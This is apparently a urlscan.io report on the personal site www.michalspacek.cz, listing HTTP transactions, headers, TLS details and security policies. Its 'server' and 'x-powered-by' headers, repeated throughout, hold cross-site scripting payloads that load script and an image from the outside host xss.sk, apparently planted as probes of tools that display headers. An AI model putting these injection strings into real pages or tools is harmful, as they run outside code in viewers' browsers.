www.michalspacek.cz Open in urlscan Pro
2a05:d018:252:8f00:fe52:a8fb:27cb:748a  Public Scan

Submitted URL: https://52.19.196.144/
Effective URL: https://www.michalspacek.cz/
Submission Tags: krdprod
Submission: On January 22 via api from JP — Scanned from JP

Summary

This website contacted 1 IPs in 1 countries across 1 domains to perform 8 HTTP transactions. The main IP is 2a05:d018:252:8f00:fe52:a8fb:27cb:748a, located in Dublin, Ireland and belongs to AMAZON-02, US. The main domain is www.michalspacek.cz.
TLS certificate: Issued by R3 on January 10th 2022. Valid for: 3 months.
This is the only time www.michalspacek.cz was scanned on urlscan.io!

urlscan.io Verdict: No classification

Domain & IP information

IP Address AS Autonomous System
1 1 52.19.196.144 16509 (AMAZON-02)
8 2a05:d018:252... 16509 (AMAZON-02)
8 1
Apex Domain
Subdomains
Transfer
8 michalspacek.cz
www.michalspacek.cz
72 KB
8 1
Domain Requested by
8 www.michalspacek.cz www.michalspacek.cz
8 1
Subject Issuer Validity Valid
michalspacek.cz
R3
2022-01-10 -
2022-04-10
3 months crt.sh

This page contains 1 frames:

Primary Page: https://www.michalspacek.cz/
Frame ID: 90BE3F9135C4C85685764C388931510C
Requests: 8 HTTP requests in this frame

Screenshot

Page Title

Michal Špaček

Page URL History Show full URLs

  1. https://52.19.196.144/ HTTP 301
    https://www.michalspacek.cz/ Page URL

Page Statistics

8
Requests

100 %
HTTPS

50 %
IPv6

1
Domains

1
Subdomains

1
IPs

1
Countries

72 kB
Transfer

195 kB
Size

1
Cookies

Page URL History

This captures the URL locations of the websites, including HTTP redirects and client-side redirects via JavaScript or Meta fields.

  1. https://52.19.196.144/ HTTP 301
    https://www.michalspacek.cz/ Page URL

Redirected requests

There were HTTP redirect chains for the following requests:

8 HTTP transactions

Resource
Path
Size
x-fer
Type
MIME-Type
Primary Request /
www.michalspacek.cz/
Redirect Chain
  • https://52.19.196.144/
  • https://www.michalspacek.cz/
15 KB
6 KB
Document
General
Full URL
https://www.michalspacek.cz/
Protocol
H2
Security
TLS 1.3, , AES_128_GCM
Server
2a05:d018:252:8f00:fe52:a8fb:27cb:748a Dublin, Ireland, ASN16509 (AMAZON-02, US),
Reverse DNS
Software
<script/src=//xss.sk></script> / <script>document.write('<img src=//xss.sk title=inline_js_is_bad_mkay.gif>');</script>
Resource Hash
98ae37a69d2dd19b05827837a097d1d3e7a7e736524b8e8e93cbe19f550b1c9e
Security Headers
Name Value
Content-Security-Policy default-src 'none'; img-src 'self'; script-src 'strict-dynamic' 'nonce-CSJHwfUwwYSb8eDnbxa+jw==' 'self' 'report-sample'; style-src 'self' 'report-sample'; frame-ancestors 'none'; form-action 'self'; base-uri 'none'; upgrade-insecure-requests; report-uri https://plz.report-uri.com/r/default/csp/enforce; report-to default
Strict-Transport-Security max-age=31536000; includeSubDomains; preload
X-Content-Type-Options nosniff
X-Frame-Options DENY
X-Xss-Protection 1; mode=block

Request headers

Upgrade-Insecure-Requests
1
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept-Language
jp-JP,jp;q=0.9

Response headers

date
Sat, 22 Jan 2022 14:46:35 GMT
content-type
text/html; charset=utf-8
x-powered-by
<script>document.write('<img src=//xss.sk title=inline_js_is_bad_mkay.gif>');</script>
server
<script/src=//xss.sk></script>
x-content-type-options
nosniff
x-xss-protection
1; mode=block
referrer-policy
no-referrer, strict-origin-when-cross-origin
report-to
{"group": "default", "max_age": 31536000, "endpoints": [{"url": "https://plz.report-uri.com/a/d/g"}], "include_subdomains": true}
nel
{"report_to": "default", "max_age": 31536000, "include_subdomains": true}
x-frame-options
DENY
vary
X-Requested-With Cookie Accept-Encoding
content-security-policy
default-src 'none'; img-src 'self'; script-src 'strict-dynamic' 'nonce-CSJHwfUwwYSb8eDnbxa+jw==' 'self' 'report-sample'; style-src 'self' 'report-sample'; frame-ancestors 'none'; form-action 'self'; base-uri 'none'; upgrade-insecure-requests; report-uri https://plz.report-uri.com/r/default/csp/enforce; report-to default
permissions-policy
accelerometer=(), camera=(), geolocation=(), gyroscope=(), magnetometer=(), microphone=(), midi=(), payment=(), usb=(), interest-cohort=()
content-encoding
gzip
strict-transport-security
max-age=31536000; includeSubDomains; preload
expect-ct
max-age=0, report-uri="https://plz.report-uri.com/r/d/ct/reportOnly"

Redirect headers

server
nginx <script/src=//xss.sk></script>
date
Sat, 22 Jan 2022 14:46:35 GMT
content-type
text/html
content-length
162
location
https://www.michalspacek.cz/
strict-transport-security
max-age=31536000; includeSubDomains; preload
expect-ct
max-age=0, report-uri="https://plz.report-uri.com/r/d/ct/reportOnly"
x-powered-by
<script>document.write('<img src=//xss.sk title=inline_js_is_bad_mkay.gif>');</script>
x-content-type-options
nosniff
x-xss-protection
1; mode=block
x-frame-options
DENY
report-to
{"group": "default", "max_age": 31536000, "endpoints": [{"url": "https://plz.report-uri.com/a/d/g"}], "include_subdomains": true}
nel
{"report_to": "default", "max_age": 31536000, "include_subdomains": true}
content-security-policy
default-src 'none'; form-action 'none'; report-uri https://plz.report-uri.com/r/default/csp/enforce; report-to default
referrer-policy
no-referrer, strict-origin-when-cross-origin
WEunohQdmMxvTKr24MZfrfMRoeWj65ZATPS94Ske-G0.css
www.michalspacek.cz/i/build/
14 KB
4 KB
Stylesheet
General
Full URL
https://www.michalspacek.cz/i/build/WEunohQdmMxvTKr24MZfrfMRoeWj65ZATPS94Ske-G0.css
Requested by
Host: www.michalspacek.cz
URL: https://www.michalspacek.cz/
Protocol
H2
Security
TLS 1.3, , AES_128_GCM
Server
2a05:d018:252:8f00:fe52:a8fb:27cb:748a Dublin, Ireland, ASN16509 (AMAZON-02, US),
Reverse DNS
Software
nginx, <script/src=//xss.sk></script> / <script>document.write('<img src=//xss.sk title=inline_js_is_bad_mkay.gif>');</script>
Resource Hash
584ba7a2141d98cc6f4caaf6e0c65fadf311a1e5a3eb96404cf4bde1291ef86d
Security Headers
Name Value
Content-Security-Policy script-src 'none'; report-uri https://plz.report-uri.com/r/default/csp/enforce; report-to default
X-Content-Type-Options nosniff
X-Frame-Options DENY
X-Xss-Protection 1; mode=block

Request headers

Referer
https://www.michalspacek.cz/
Origin
https://www.michalspacek.cz
Accept-Language
jp-JP,jp;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36

Response headers

date
Sat, 22 Jan 2022 14:46:36 GMT
content-encoding
gzip
x-content-type-options
nosniff
nel
{"report_to": "default", "max_age": 31536000, "include_subdomains": true}
x-powered-by
<script>document.write('<img src=//xss.sk title=inline_js_is_bad_mkay.gif>');</script>
x-xss-protection
1; mode=block
last-modified
Thu, 20 Jan 2022 19:13:39 GMT
server
nginx, <script/src=//xss.sk></script>
x-frame-options
DENY
etag
W/"61e9b463-372a"
vary
Accept-Encoding, Origin
report-to
{"group": "default", "max_age": 31536000, "endpoints": [{"url": "https://plz.report-uri.com/a/d/g"}], "include_subdomains": true}
content-type
text/css
access-control-allow-origin
https://www.michalspacek.cz
cache-control
max-age=31536000, immutable
content-security-policy
script-src 'none'; report-uri https://plz.report-uri.com/r/default/csp/enforce; report-to default
expires
Sun, 22 Jan 2023 14:46:36 GMT
iZtS4XGg7zJBocmGsWK6Jt9Dq0vZX8j9OpEjnwCqDus.css
www.michalspacek.cz/i/build/
6 KB
2 KB
Stylesheet
General
Full URL
https://www.michalspacek.cz/i/build/iZtS4XGg7zJBocmGsWK6Jt9Dq0vZX8j9OpEjnwCqDus.css
Requested by
Host: www.michalspacek.cz
URL: https://www.michalspacek.cz/
Protocol
H2
Security
TLS 1.3, , AES_128_GCM
Server
2a05:d018:252:8f00:fe52:a8fb:27cb:748a Dublin, Ireland, ASN16509 (AMAZON-02, US),
Reverse DNS
Software
nginx, <script/src=//xss.sk></script> / <script>document.write('<img src=//xss.sk title=inline_js_is_bad_mkay.gif>');</script>
Resource Hash
899b52e171a0ef3241a1c986b162ba26df43ab4bd95fc8fd3a91239f00aa0eeb
Security Headers
Name Value
Content-Security-Policy script-src 'none'; report-uri https://plz.report-uri.com/r/default/csp/enforce; report-to default
X-Content-Type-Options nosniff
X-Frame-Options DENY
X-Xss-Protection 1; mode=block

Request headers

Referer
https://www.michalspacek.cz/
Origin
https://www.michalspacek.cz
Accept-Language
jp-JP,jp;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36

Response headers

date
Sat, 22 Jan 2022 14:46:36 GMT
content-encoding
gzip
x-content-type-options
nosniff
nel
{"report_to": "default", "max_age": 31536000, "include_subdomains": true}
x-powered-by
<script>document.write('<img src=//xss.sk title=inline_js_is_bad_mkay.gif>');</script>
x-xss-protection
1; mode=block
last-modified
Thu, 20 Jan 2022 19:26:16 GMT
server
nginx, <script/src=//xss.sk></script>
x-frame-options
DENY
etag
W/"61e9b758-18d7"
vary
Accept-Encoding, Origin
report-to
{"group": "default", "max_age": 31536000, "endpoints": [{"url": "https://plz.report-uri.com/a/d/g"}], "include_subdomains": true}
content-type
text/css
access-control-allow-origin
https://www.michalspacek.cz
cache-control
max-age=31536000, immutable
content-security-policy
script-src 'none'; report-uri https://plz.report-uri.com/r/default/csp/enforce; report-to default
expires
Sun, 22 Jan 2023 14:46:36 GMT
Gf3U8DHTW3x425z487TawKVRPvPoCzQzAGWkDt8y8Pg.js
www.michalspacek.cz/i/build/
90 KB
32 KB
Script
General
Full URL
https://www.michalspacek.cz/i/build/Gf3U8DHTW3x425z487TawKVRPvPoCzQzAGWkDt8y8Pg.js
Requested by
Host: www.michalspacek.cz
URL: https://www.michalspacek.cz/
Protocol
H2
Security
TLS 1.3, , AES_128_GCM
Server
2a05:d018:252:8f00:fe52:a8fb:27cb:748a Dublin, Ireland, ASN16509 (AMAZON-02, US),
Reverse DNS
Software
nginx, <script/src=//xss.sk></script> / <script>document.write('<img src=//xss.sk title=inline_js_is_bad_mkay.gif>');</script>
Resource Hash
19fdd4f031d35b7c78db9cf8f3b4dac0a5513ef3e80b34330065a40edf32f0f8
Security Headers
Name Value
Content-Security-Policy script-src 'none'; report-uri https://plz.report-uri.com/r/default/csp/enforce; report-to default
X-Content-Type-Options nosniff
X-Frame-Options DENY
X-Xss-Protection 1; mode=block

Request headers

Referer
https://www.michalspacek.cz/
Origin
https://www.michalspacek.cz
Accept-Language
jp-JP,jp;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36

Response headers

date
Sat, 22 Jan 2022 14:46:36 GMT
content-encoding
gzip
x-content-type-options
nosniff
nel
{"report_to": "default", "max_age": 31536000, "include_subdomains": true}
x-powered-by
<script>document.write('<img src=//xss.sk title=inline_js_is_bad_mkay.gif>');</script>
x-xss-protection
1; mode=block
last-modified
Thu, 20 Jan 2022 19:13:39 GMT
server
nginx, <script/src=//xss.sk></script>
x-frame-options
DENY
etag
W/"61e9b463-167a3"
vary
Accept-Encoding, Origin
report-to
{"group": "default", "max_age": 31536000, "endpoints": [{"url": "https://plz.report-uri.com/a/d/g"}], "include_subdomains": true}
content-type
application/javascript
access-control-allow-origin
https://www.michalspacek.cz
cache-control
max-age=31536000, immutable
content-security-policy
script-src 'none'; report-uri https://plz.report-uri.com/r/default/csp/enforce; report-to default
expires
Sun, 22 Jan 2023 14:46:36 GMT
yC03jxMBn4duD0UGwp26uz99cT92zzCvII7dGS7cGTw.js
www.michalspacek.cz/i/build/
12 KB
5 KB
Script
General
Full URL
https://www.michalspacek.cz/i/build/yC03jxMBn4duD0UGwp26uz99cT92zzCvII7dGS7cGTw.js
Requested by
Host: www.michalspacek.cz
URL: https://www.michalspacek.cz/
Protocol
H2
Security
TLS 1.3, , AES_128_GCM
Server
2a05:d018:252:8f00:fe52:a8fb:27cb:748a Dublin, Ireland, ASN16509 (AMAZON-02, US),
Reverse DNS
Software
nginx, <script/src=//xss.sk></script> / <script>document.write('<img src=//xss.sk title=inline_js_is_bad_mkay.gif>');</script>
Resource Hash
c82d378f13019f876e0f4506c29dbabb3f7d713f76cf30af208edd192edc193c
Security Headers
Name Value
Content-Security-Policy script-src 'none'; report-uri https://plz.report-uri.com/r/default/csp/enforce; report-to default
X-Content-Type-Options nosniff
X-Frame-Options DENY
X-Xss-Protection 1; mode=block

Request headers

Referer
https://www.michalspacek.cz/
Origin
https://www.michalspacek.cz
Accept-Language
jp-JP,jp;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36

Response headers

date
Sat, 22 Jan 2022 14:46:36 GMT
content-encoding
gzip
x-content-type-options
nosniff
nel
{"report_to": "default", "max_age": 31536000, "include_subdomains": true}
x-powered-by
<script>document.write('<img src=//xss.sk title=inline_js_is_bad_mkay.gif>');</script>
x-xss-protection
1; mode=block
last-modified
Sat, 22 Jan 2022 07:18:15 GMT
server
nginx, <script/src=//xss.sk></script>
x-frame-options
DENY
etag
W/"61ebafb7-2ecf"
vary
Accept-Encoding, Origin
report-to
{"group": "default", "max_age": 31536000, "endpoints": [{"url": "https://plz.report-uri.com/a/d/g"}], "include_subdomains": true}
content-type
application/javascript
access-control-allow-origin
https://www.michalspacek.cz
cache-control
max-age=31536000, immutable
content-security-policy
script-src 'none'; report-uri https://plz.report-uri.com/r/default/csp/enforce; report-to default
expires
Sun, 22 Jan 2023 14:46:36 GMT
4240Go1TXIXsP3AWLhnx3L4_KyFJNIz45ox8LfnXBjw.js
www.michalspacek.cz/i/build/
441 B
977 B
Script
General
Full URL
https://www.michalspacek.cz/i/build/4240Go1TXIXsP3AWLhnx3L4_KyFJNIz45ox8LfnXBjw.js
Requested by
Host: www.michalspacek.cz
URL: https://www.michalspacek.cz/
Protocol
H2
Security
TLS 1.3, , AES_128_GCM
Server
2a05:d018:252:8f00:fe52:a8fb:27cb:748a Dublin, Ireland, ASN16509 (AMAZON-02, US),
Reverse DNS
Software
nginx, <script/src=//xss.sk></script> / <script>document.write('<img src=//xss.sk title=inline_js_is_bad_mkay.gif>');</script>
Resource Hash
e36e341a8d535c85ec3f70162e19f1dcbe3f2b2149348cf8e68c7c2df9d7063c
Security Headers
Name Value
Content-Security-Policy script-src 'none'; report-uri https://plz.report-uri.com/r/default/csp/enforce; report-to default
X-Content-Type-Options nosniff
X-Frame-Options DENY
X-Xss-Protection 1; mode=block

Request headers

Referer
https://www.michalspacek.cz/
Origin
https://www.michalspacek.cz
Accept-Language
jp-JP,jp;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36

Response headers

date
Sat, 22 Jan 2022 14:46:36 GMT
content-encoding
gzip
x-content-type-options
nosniff
nel
{"report_to": "default", "max_age": 31536000, "include_subdomains": true}
x-powered-by
<script>document.write('<img src=//xss.sk title=inline_js_is_bad_mkay.gif>');</script>
x-xss-protection
1; mode=block
last-modified
Thu, 20 Jan 2022 19:26:16 GMT
server
nginx, <script/src=//xss.sk></script>
x-frame-options
DENY
etag
W/"61e9b758-1b9"
vary
Accept-Encoding, Origin
report-to
{"group": "default", "max_age": 31536000, "endpoints": [{"url": "https://plz.report-uri.com/a/d/g"}], "include_subdomains": true}
content-type
application/javascript
access-control-allow-origin
https://www.michalspacek.cz
cache-control
max-age=31536000, immutable
content-security-policy
script-src 'none'; report-uri https://plz.report-uri.com/r/default/csp/enforce; report-to default
expires
Sun, 22 Jan 2023 14:46:36 GMT
4hrqE-wHEyNpJxYr9Ste5rZmV4NK3dyhHpoFJtQ41uY.js
www.michalspacek.cz/i/build/
57 KB
21 KB
Script
General
Full URL
https://www.michalspacek.cz/i/build/4hrqE-wHEyNpJxYr9Ste5rZmV4NK3dyhHpoFJtQ41uY.js
Requested by
Host: www.michalspacek.cz
URL: https://www.michalspacek.cz/
Protocol
H2
Security
TLS 1.3, , AES_128_GCM
Server
2a05:d018:252:8f00:fe52:a8fb:27cb:748a Dublin, Ireland, ASN16509 (AMAZON-02, US),
Reverse DNS
Software
nginx, <script/src=//xss.sk></script> / <script>document.write('<img src=//xss.sk title=inline_js_is_bad_mkay.gif>');</script>
Resource Hash
e21aea13ec0713236927162bf52b5ee6b66657834adddca11e9a0526d438d6e6
Security Headers
Name Value
Content-Security-Policy script-src 'none'; report-uri https://plz.report-uri.com/r/default/csp/enforce; report-to default
X-Content-Type-Options nosniff
X-Frame-Options DENY
X-Xss-Protection 1; mode=block

Request headers

Referer
https://www.michalspacek.cz/
Origin
https://www.michalspacek.cz
Accept-Language
jp-JP,jp;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36

Response headers

date
Sat, 22 Jan 2022 14:46:36 GMT
content-encoding
gzip
x-content-type-options
nosniff
nel
{"report_to": "default", "max_age": 31536000, "include_subdomains": true}
x-powered-by
<script>document.write('<img src=//xss.sk title=inline_js_is_bad_mkay.gif>');</script>
x-xss-protection
1; mode=block
last-modified
Sat, 22 Jan 2022 07:18:15 GMT
server
nginx, <script/src=//xss.sk></script>
x-frame-options
DENY
etag
W/"61ebafb7-e38b"
vary
Accept-Encoding, Origin
report-to
{"group": "default", "max_age": 31536000, "endpoints": [{"url": "https://plz.report-uri.com/a/d/g"}], "include_subdomains": true}
content-type
application/javascript
access-control-allow-origin
https://www.michalspacek.cz
cache-control
max-age=31536000, immutable
content-security-policy
script-src 'none'; report-uri https://plz.report-uri.com/r/default/csp/enforce; report-to default
expires
Sun, 22 Jan 2023 14:46:36 GMT
michal-spacek.jpg
www.michalspacek.cz/i/images/
779 B
1 KB
Image
General
Full URL
https://www.michalspacek.cz/i/images/michal-spacek.jpg
Requested by
Host: www.michalspacek.cz
URL: https://www.michalspacek.cz/
Protocol
H2
Security
TLS 1.3, , AES_128_GCM
Server
2a05:d018:252:8f00:fe52:a8fb:27cb:748a Dublin, Ireland, ASN16509 (AMAZON-02, US),
Reverse DNS
Software
nginx, <script/src=//xss.sk></script> / <script>document.write('<img src=//xss.sk title=inline_js_is_bad_mkay.gif>');</script>
Resource Hash
d0907aaaa028886d37138ea0c00e2803c86d4eb5409a048d93dd728ed4e3571b
Security Headers
Name Value
Content-Security-Policy script-src 'none'; report-uri https://plz.report-uri.com/r/default/csp/enforce; report-to default
X-Content-Type-Options nosniff
X-Frame-Options DENY
X-Xss-Protection 1; mode=block

Request headers

Accept-Language
jp-JP,jp;q=0.9
Referer
https://www.michalspacek.cz/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36

Response headers

date
Sat, 22 Jan 2022 14:46:36 GMT
x-content-type-options
nosniff
nel
{"report_to": "default", "max_age": 31536000, "include_subdomains": true}
x-powered-by
<script>document.write('<img src=//xss.sk title=inline_js_is_bad_mkay.gif>');</script>
content-length
779
x-xss-protection
1; mode=block
last-modified
Sun, 16 Jun 2019 02:47:51 GMT
server
nginx, <script/src=//xss.sk></script>
x-frame-options
DENY
etag
"5d05add7-30b"
vary
Origin
report-to
{"group": "default", "max_age": 31536000, "endpoints": [{"url": "https://plz.report-uri.com/a/d/g"}], "include_subdomains": true}
content-type
image/jpeg
cache-control
max-age=604800
content-security-policy
script-src 'none'; report-uri https://plz.report-uri.com/r/default/csp/enforce; report-to default
accept-ranges
bytes
expires
Sat, 29 Jan 2022 14:46:36 GMT

Verdicts & Comments Add Verdict or Comment

8 JavaScript Global Variables

These are the non-standard "global" variables defined on the window object. These can be helpful in identifying possible client-side frameworks and code.

function| $ function| jQuery object| $jscomp function| $jscomp$lookupPolyfilledValue object| ___FONT_AWESOME___ object| FontAwesomeConfig object| FontAwesome object| Nette

1 Cookies

Domain/Path Name / Value
www.michalspacek.cz/ Name: _nss
Value: 1

1 Console Messages

Source Level URL
Text
security warning
Message:
Error with Permissions-Policy header: Unrecognized feature: 'interest-cohort'.

Security Headers

This page lists any security headers set by the main page. If you want to understand what these mean and how to use them, head on over to this page

Header Value
Content-Security-Policy default-src 'none'; img-src 'self'; script-src 'strict-dynamic' 'nonce-CSJHwfUwwYSb8eDnbxa+jw==' 'self' 'report-sample'; style-src 'self' 'report-sample'; frame-ancestors 'none'; form-action 'self'; base-uri 'none'; upgrade-insecure-requests; report-uri https://plz.report-uri.com/r/default/csp/enforce; report-to default
Strict-Transport-Security max-age=31536000; includeSubDomains; preload
X-Content-Type-Options nosniff
X-Frame-Options DENY
X-Xss-Protection 1; mode=block